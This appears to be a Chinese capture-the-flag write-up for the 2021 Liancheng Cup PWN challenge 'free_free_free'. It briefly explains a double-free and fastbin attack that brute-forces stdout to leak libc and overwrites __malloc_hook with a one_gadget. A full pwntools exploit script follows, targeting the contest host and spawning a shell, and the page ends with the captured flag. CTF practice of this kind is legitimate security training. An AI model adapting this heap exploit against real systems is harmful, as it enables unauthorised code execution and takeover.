网络安全|2021年“莲城杯”网络安全大赛-PWN-free_free_free
2021年“莲城杯”网络安全大赛-PWN-free_free_free 题目名称:free_free_free
题目内容:你一定很擅长free吧。靶机:nc 183.129.189.60 10023
题目分值:300.0
题目难度:中等
相关附件:free_free_free的附件.zip
解题思路:
1.保护机制,本地libc与远程一样,就没必要加载附件那个 
文章图片
2.漏洞点 - double free 【网络安全|2021年“莲城杯”网络安全大赛-PWN-free_free_free】
文章图片
3.要爆破stdout,1/16的可能,stdout-0x43有7f的size,malloc_hook-0x23有7f的size,fastbin 伪造size,reallo调节栈帧,exp中没写循环,多执行几次。
#!/usr/bin/env python from pwn import *local = 0
debug = 0
binary = "./free_free_free"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"if local:
# p = process(binary) libc = ELF(lib)
else :
# p = remote("183.129.189.60","10023")
# lib = "./libc.so.6"
libc = ELF(lib)s = lambda buf : p.send(buf)
sl = lambda buf : p.sendline(buf)
sa = lambda delim, buf : p.sendafter(delim, buf)
sal = lambda delim, buf : p.sendlineafter(delim, buf)
sh = lambda : p.interactive()
r = lambda n=None : p.recv(n)
ru = lambda delim : p.recvuntil(delim)
r7f = lambda : u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
trs = lambda addr : libc.address+addr
gadget = lambda ins : libc.search(asm(ins,arch="amd64")).next()
tohex = lambda buf : "".join("\\x%02x"%ord(_) for _ in buf)def add(size,content):
sal("> ","1")
sal("size> ",str(size))
sa("message> ",content)
def free(id):
sal("> ","2")
sal("idx> ",str(id))
def pwn():
add(0x78+1,"0"*8)
add(0x60,"1"*8)
add(0x60,"2"*8)
free(0)
add(0x18,"3"*8)
add(0x60,"\xdd\x65")
free(2)
free(1)
free(2)
add(0x60,chr(0x20))
add(0x60,"tmp")
add(0x60,"tmp")
# raw_input()
add(0x60,"tmp")
payload = ""
payload += chr(0)*(0x33)
payload += p64(0xfbad3887)
payload += p64(0)*3
payload += "\x88" #_chain filed
add(0x68,payload) libc.address = r7f()-libc.sym["_IO_2_1_stdin_"]
info("libc basse => 0x%x"%libc.address) ogg = [trs(_) for _ in(0x45226,0x4527a,0xf03a4,0xf1247)]
og = ogg[1]
free(2)
free(1)
free(2)
add(0x60,p64(libc.sym[" malloc_hook"]-0x23))
add(0x60,"tmp")
add(0x60,"tmp")
payload = ""
payload += chr(0)*(0x13-8)
payload += p64(og)
payload += p64(libc.sym["realloc"]+16)
add(0x68,payload)
sl("1")
sl("17")
while True:
try:
# p = process(binary)
p = remote("183.129.189.60","10023")
pwn()
break
except:
p.close()
raw_input("[*] get shell")
sh()
# DASCTF{7a95efe41004077a790d234f5b90c343}
推荐阅读
- 野营记-第五章|野营记-第五章 讨伐梦魇兽
- 艾略特的交易法则“遵循自然规律”
- 闲杂“细雨”
- “成长”读书社群招募
- 上班后阅读开始变成一件奢侈的事
- “精神病患者”的角度问题
- 说的真好
- 2021-02-10(找不回的“年味”……)
- “不完美,才美”01(190410)
- 火锅